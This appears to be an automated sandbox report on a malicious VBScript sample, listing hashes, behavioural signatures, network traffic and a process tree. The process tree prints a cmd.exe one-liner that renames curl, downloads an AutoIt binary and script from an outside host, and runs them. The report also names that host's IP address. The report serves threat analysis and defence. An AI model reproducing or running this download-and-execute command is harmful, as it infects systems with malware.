Resubmissions

04/10/2023, 14:22 UTC

231004-rpmycsed29 10

04/10/2023, 13:53 UTC

231004-q6y7aaeb22 10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    04/10/2023, 13:53 UTC

General

  • Target

    Test_395-13959.vbs

  • Size

    6.9MB

  • MD5

    5a9c56d5b6a4ae5fc402d99fa45f5598

  • SHA1

    d1572724ca4ecc99edaf4104f51385265bb27682

  • SHA256

    961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498

  • SHA512

    5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57

  • SSDEEP

    49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o xqkbij.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe xqkbij.au3
      2⤵
        PID:2284

    Network

    • flag-us
      DNS
      getldrrgoodgame.com
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      getldrrgoodgame.com
      IN A
      Response
      getldrrgoodgame.com
      IN A
      81.19.135.139
    • flag-ru
      POST
      http://getldrrgoodgame.com:2351/omxgnyqu
      WScript.exe
      Remote address:
      81.19.135.139:2351
      Request
      POST /omxgnyqu HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
      a: a
      Content-Length: 0
      Host: getldrrgoodgame.com:2351
      Response
      HTTP/1.1 200 OK
      Connection: close
      Content-Type: text/html; charset=ISO-8859-1
      Content-Length: 243
      Date: Wed, 04 Oct 2023 13:53:14 GMT
    • 81.19.135.139:2351
      http://getldrrgoodgame.com:2351/omxgnyqu
      http
      WScript.exe
      468 B
      596 B
      6
      5

      HTTP Request

      POST http://getldrrgoodgame.com:2351/omxgnyqu

      HTTP Response

      200
    • 8.8.8.8:53
      getldrrgoodgame.com
      dns
      WScript.exe
      65 B
      81 B
      1
      1

      DNS Request

      getldrrgoodgame.com

      DNS Response

      81.19.135.139

    MITRE ATT&CK Enterprise v15
